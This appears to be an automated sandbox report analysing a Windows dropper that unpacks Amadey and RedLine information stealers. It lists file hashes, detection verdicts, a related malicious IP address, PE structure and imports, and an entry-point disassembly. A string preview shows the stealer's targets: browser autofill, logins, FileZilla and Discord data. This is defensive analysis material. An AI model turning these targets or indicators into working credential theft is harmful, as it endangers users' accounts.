Overall analysis duration:0h 10m 12s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:14
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample file name:qu0t4ukLoN.exe
Original Sample Name:1df346c349b9b71b11825690be73e635.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@15/8@0/1
EGA Information:
• Successful, ratio: 80%
HDC Information:
• Successful, ratio: 99.8% (good quality ratio 96.9%)
• Quality average: 82.6%
• Quality standard deviation: 24.1%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 195
• Number of non-executed functions: 124
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target b7687179.exe, PID 3320 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
11:40:47 | API Interceptor | 11x Sleep call for process: b7687179.exe modified
                                                                                                                                                                                                      B0DAZ0q0zH.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                      • 83.97.73.122
                                                                                                                                                                                                      No context
                                                                                                                                                                                                      No context
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):226
                                                                                                                                                                                                      Entropy (8bit):5.3467126928258955
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                                                                                                                                                                      MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                                                                                                                                                                      SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                                                                                                                                                                      SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                                                                                                                                                                      SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe
                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2843
                                                                                                                                                                                                      Entropy (8bit):5.3371553026862095
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHK1HG1qX:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxk
                                                                                                                                                                                                      MD5:EBF4AEAE98F14F4480152E9EDBB24123
                                                                                                                                                                                                      SHA1:21F9D2A708D7709FECD4A837536B588D953FA6FC
                                                                                                                                                                                                      SHA-256:6278F6B29B841FD578D1F01D6BA7CD9FD7A3D977BE1D503A2E19C9B2017EA1B7
                                                                                                                                                                                                      SHA-512:F7A1EEA0AB96145F8AA49D43CC8C8E171137FA89E4780DCF7FC236488747518C42BCABED71CB8CB6DAF35DDF701CB1BC01A122A4E8E553E028DAA0DC0287FDC9
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                                                                                                                                                      Process:C:\Users\user\Desktop\qu0t4ukLoN.exe
                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):324094
                                                                                                                                                                                                      Entropy (8bit):7.54372131384144
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6144:xcDje7OxoovhLLDLjC4d8QvV+hdaLB4rOlEnQ2m3bR:iDyOVvhLLH24dBvmdaLBzEnQ2
                                                                                                                                                                                                      MD5:AAE88589C2939D21D935B6DE0E73870B
                                                                                                                                                                                                      SHA1:AA7CB7CFA1BCB86B52E105EA7D8D5D77A4013325
                                                                                                                                                                                                      SHA-256:F6A7AE755C44744C961C5C054EE17E7E1209E9E97FBDA412BC406FBE61E2A90F
                                                                                                                                                                                                      SHA-512:70AC1FC2670E5C1098E7994FD95751302619A800BF15C42CF065AC8E86E7B799CF6044D4C7DB96BFA9B0605794F94B15EE34BC3E220828503BAE33F852537AA5
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                      Process:C:\Users\user\Desktop\qu0t4ukLoN.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):457216
                                                                                                                                                                                                      Entropy (8bit):7.786373811719987
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6144:Kpy+bnr+5p0yN90QEmoGpHE2TQYNCZje6TsbzxxTgINo2hUVE2MyrOGdKbert:TMrRy900oGpxTQaCjixxTy2bXat
                                                                                                                                                                                                      MD5:A9A0FDF699EB764206C59FF3CA3FAC53
                                                                                                                                                                                                      SHA1:2578C481B0D67C710FC64163712021043D49CAA8
                                                                                                                                                                                                      SHA-256:B41DD10009E2BD916D9C7AFAB7D3D9E673D4E111278EFFDD05D44F68E9F84FE4
                                                                                                                                                                                                      SHA-512:2D3784C01F16E11BA8D2DAC7D91BD6FCB3B1D5095578D4C6C82A788CFDAF278D18E31B1FF5FB284AA593AD96F39CA8789BF182FE030D6318CA080072CE3191E8
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):210873
                                                                                                                                                                                                      Entropy (8bit):6.33924537885446
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3072:meTRJ0kHbnpN23kQKp5XzutZXKGrpeN84LuZAIybiy3xEfbi:FTR2AnpN2wDurXBeBuZAIMEj
                                                                                                                                                                                                      MD5:3ED5D8F4F6620DE95B8EF02F28C9C5E9
                                                                                                                                                                                                      SHA1:EEFDA1DF3A3297B00D08475B93084495ECB7FD0A
                                                                                                                                                                                                      SHA-256:3E2696E2C4CCC222063F06F6031DC8DACF54A3B0D923650135AF17C74789738A
                                                                                                                                                                                                      SHA-512:C4CB8AFE75866A9D7346BD9241D9119B8478259A037A39663EC0A507E5ABE2F95B10393E412BA2DC15A93316F3DE0A4E043EBC1A53E298785DB431FC70B91D4C
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Yara Hits:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exe, Author: Joe Security
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 69%
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):281600
                                                                                                                                                                                                      Entropy (8bit):7.572515848405127
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6144:KTy+bnr+0p0yN90QEsZjeETsbzxgggINo2wUME2aR:tMr0y90elixggy2P
                                                                                                                                                                                                      MD5:4D67FD4D3D62A45215D1FBDF9CA87397
                                                                                                                                                                                                      SHA1:FB686838CEC8323CE6EC87A133C48E9723C3DED5
                                                                                                                                                                                                      SHA-256:0C36FA81B63A4C7D12FA7A0CF055BACCA0C423E7DFEDAD6EB55281C914CA0003
                                                                                                                                                                                                      SHA-512:D3718984BC81E18624EE801AA01F5B482DDBB2551C3AB25772F88947BAADB637733F633F77D376EF46126C4FDE6629E9DE85D898425AF655E817C0466CB94574
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe
                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):186366
                                                                                                                                                                                                      Entropy (8bit):6.898951882290762
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3072:lAZJrtymkLKh/gH2TPDXD1qk+yxXeOx5ITx:l+yvKdFPDXDM2D
                                                                                                                                                                                                      MD5:1BE37E0816A88025F557178CA7FC03C8
                                                                                                                                                                                                      SHA1:BE1947797AC7B4CDED7F3524B5AD1CD6A4B28CFC
                                                                                                                                                                                                      SHA-256:F8DA12B0DDF6695F8669679E0148756B3676E55D2F1C9121E5A04DDAF78C6E6B
                                                                                                                                                                                                      SHA-512:E3D189AE5918D6DC9128B8564FD90DE5FCDC2DD9BFDE5C3BFB2130BBB739CB348DD2A9B8B08D84D322C41A85F6C3409EA3C78173CA3894606B71DAF4584D8DFB
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):148489
                                                                                                                                                                                                      Entropy (8bit):5.412914556371622
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3072:LV+m5chQmRSZsBxioW/JruNFmRsZhCZR8e8ha:LjEx6U3ZhC7
                                                                                                                                                                                                      MD5:927C5B1DEF98D855184A0ED56D8A2787
                                                                                                                                                                                                      SHA1:EEB57B0120D4C1F6539CDC372A5E71A8947FDE3C
                                                                                                                                                                                                      SHA-256:1A0C4908C739CF9C405A050A6FE29214525F46350E7BA49BD26F9BD7E60F6BC9
                                                                                                                                                                                                      SHA-512:93957AD10BE2B54D2E5AB9E40B3C1A7767C9295A74E854A98FB9EDBD42D7F32C2F463913A0A7832C73697A3264F966A7E45713CBFEA8326A306DFED80FF9A1CB
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe, Author: Joe Security
                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe, Author: ditekSHen
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!1................0.................. ........@.. ....................................@.....................................K.......N............................................................................ ............... ..H............text........ ...................... ..`.rsrc...N...........................@..@.reloc...............B..............@..B........................H.......X...H.......u...................................................a.u.t.o.f.i.l.l.P.r.o.f.i.l.e.s.T.o.t.a.l. .o.f. .R.A.M.V.P.E.n.t.i.t.y.1.2.N...A.p.p.D.a.t.a.\.L.o.c.a.l.\.....[.^.\.u.0.0.2.0.-.\.u.0.0.7.F.].U.N.K.N.O.W.N...L.o.c.a.l. .S.t.a.t.e...P.r.o.c.e.s.s.I.d.......1.*...1.l.1.d.1.b.......P.r.o.f.i.l.e._.%.a.p.p.d.a.t.a.%.\.....l.o.g.i.n.s.....{.0.}.\.F.i.l.e.Z.i.l.l.a.\.r.e.c.e.n.t.s.e.r.v.e.r.s...x.m.l...%.a.p.p.d.a.t.a.%.\.d.i.s.c.o.r.d.\.L.o.c.a.l. .S.t.o.r.
                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Entropy (8bit):7.902876514651296
                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                      File name:qu0t4ukLoN.exe
                                                                                                                                                                                                      File size:782336
                                                                                                                                                                                                      MD5:1df346c349b9b71b11825690be73e635
                                                                                                                                                                                                      SHA1:13df3b1666b674f48b1fc2a836fee8ce99381fb5
                                                                                                                                                                                                      SHA256:8e96ef86e327dd3bbc1dab16ce1e57e8f380d9b2df919158f1b6786cfd6f717e
                                                                                                                                                                                                      SHA512:96ffdf2aa68e54bbbfa32659d5683851adba4c50f19ab348233af6a5c284cbbb45b19344cc3668990e51ca66ddfb7c66cf1186d01a793380187a37553967fc8f
                                                                                                                                                                                                      SSDEEP:12288:vMrGy90d/w92r1bjyeDmpa2lixNTy2Iuuomfds+nnII4d22mdQLBNEFz:VyqFvrNTy2dm1zn94Q2mdUS
                                                                                                                                                                                                      TLSH:56F42353A3D82133D8F81F7088FA028B1B397E616A78072B3745A99D1CF3D946576B27
                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
                                                                                                                                                                                                      Icon Hash:3b6120282c4c5a1f
                                                                                                                                                                                                      Entrypoint:0x406a60
                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                      Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                      OS Version Major:10
                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                      File Version Major:10
                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                      Subsystem Version Major:10
                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                      Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                      call 00007FEAA9141CD5h
                                                                                                                                                                                                      jmp 00007FEAA91415E5h
                                                                                                                                                                                                      push 00000058h
                                                                                                                                                                                                      push 004072B8h
                                                                                                                                                                                                      call 00007FEAA9141D77h
                                                                                                                                                                                                      xor ebx, ebx
                                                                                                                                                                                                      mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                      lea eax, dword ptr [ebp-68h]
                                                                                                                                                                                                      push eax
                                                                                                                                                                                                      call dword ptr [0040A184h]
                                                                                                                                                                                                      mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                      mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                      mov esi, dword ptr [eax+04h]
                                                                                                                                                                                                      mov edi, ebx
                                                                                                                                                                                                      mov edx, 004088ACh
                                                                                                                                                                                                      mov ecx, esi
                                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                                      lock cmpxchg dword ptr [edx], ecx
                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                      je 00007FEAA91415FAh
                                                                                                                                                                                                      cmp eax, esi
                                                                                                                                                                                                      jne 00007FEAA91415E9h
                                                                                                                                                                                                      xor esi, esi
                                                                                                                                                                                                      inc esi
                                                                                                                                                                                                      mov edi, esi
                                                                                                                                                                                                      jmp 00007FEAA91415F2h
                                                                                                                                                                                                      push 000003E8h
                                                                                                                                                                                                      call dword ptr [0040A188h]
                                                                                                                                                                                                      jmp 00007FEAA91415B9h
                                                                                                                                                                                                      xor esi, esi
                                                                                                                                                                                                      inc esi
                                                                                                                                                                                                      cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                      jne 00007FEAA91415ECh
                                                                                                                                                                                                      push 0000001Fh
                                                                                                                                                                                                      call 00007FEAA9141B0Bh
                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                      jmp 00007FEAA914161Ch
                                                                                                                                                                                                      cmp dword ptr [004088B0h], ebx
                                                                                                                                                                                                      jne 00007FEAA914160Eh
                                                                                                                                                                                                      mov dword ptr [004088B0h], esi
                                                                                                                                                                                                      push 004010C4h
                                                                                                                                                                                                      push 004010B8h
                                                                                                                                                                                                      call 00007FEAA9141736h
                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                      je 00007FEAA91415F9h
                                                                                                                                                                                                      mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                      mov eax, 000000FFh
                                                                                                                                                                                                      jmp 00007FEAA9141719h
                                                                                                                                                                                                      mov dword ptr [004081E4h], esi
                                                                                                                                                                                                      cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                      jne 00007FEAA91415FDh
                                                                                                                                                                                                      push 004010B4h
                                                                                                                                                                                                      push 004010ACh
                                                                                                                                                                                                      call 00007FEAA9141CC5h
                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                      mov dword ptr [000088B0h], 00000000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa28c | 0xb4 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0xb68ec | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc3000 | 0x888 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1410 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1008 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x288 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6314 | 0x6400 | False | 0.5744140625 | data | 6.314163792045976 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x8000 | 0x1a48 | 0x200 | False | 0.609375 | data | 4.970639543960129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa000 | 0x1052 | 0x1200 | False | 0.4140625 | data | 5.025949912909207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0xb7000 | 0xb6a00 | False | 0.95906191178987 | data | 7.930785235213812 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc3000 | 0x888 | 0xa00 | False | 0.746484375 | data | 6.222637930812128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
AVI | 0xc9f8 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States
RT_ICON | 0xf814 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States
RT_ICON | 0xfe7c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States
RT_ICON | 0x10164 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States
RT_ICON | 0x1034c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States
RT_ICON | 0x10474 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States
RT_ICON | 0x1131c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States
RT_ICON | 0x11bc4 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States
RT_ICON | 0x1228c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States
RT_ICON | 0x127f4 | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x201c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
RT_ICON | 0x22770 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
RT_ICON | 0x23818 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States
RT_ICON | 0x241a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
RT_DIALOG | 0x24608 | 0x2f2 | data | English | United States
RT_DIALOG | 0x248fc | 0x1b0 | data | English | United States
RT_DIALOG | 0x24aac | 0x166 | data | English | United States
RT_DIALOG | 0x24c14 | 0x1c0 | data | English | United States
RT_DIALOG | 0x24dd4 | 0x130 | data | English | United States
RT_DIALOG | 0x24f04 | 0x120 | data | English | United States
RT_STRING | 0x25024 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States
RT_STRING | 0x250b0 | 0x520 | data | English | United States
RT_STRING | 0x255d0 | 0x5cc | data | English | United States
RT_STRING | 0x25b9c | 0x4b0 | data | English | United States
RT_STRING | 0x2604c | 0x44a | data | English | United States
RT_STRING | 0x26498 | 0x3ce | data | English | United States
RT_RCDATA | 0x26868 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x26870 | 0x9b354 | Microsoft Cabinet archive data, many, 635732 bytes, 2 files, at 0x2c +A "v7020033.exe" +A "d4851931.exe", ID 1672, number 1, 24 datablocks, 0x1503 compression | English | United States
RT_RCDATA | 0xc1bc4 | 0x4 | data | English | United States
RT_RCDATA | 0xc1bc8 | 0x24 | data | English | United States
RT_RCDATA | 0xc1bec | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0xc1bf4 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0xc1bfc | 0x4 | data | English | United States
RT_RCDATA | 0xc1c00 | 0xd | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0xc1c10 | 0x4 | data | English | United States
RT_RCDATA | 0xc1c14 | 0xd | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0xc1c24 | 0x4 | data | English | United States
RT_RCDATA | 0xc1c28 | 0x9 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0xc1c34 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0xc1c3c | 0x7 | ASCII text, with no line terminators | English | United States
RT_GROUP_ICON | 0xc1c44 | 0xbc | data | English | United States
RT_VERSION | 0xc1d00 | 0x408 | data | English | United States
RT_MANIFEST | 0xc2108 | 0x7e2 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll | GetDeviceCaps
USER32.dll | SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
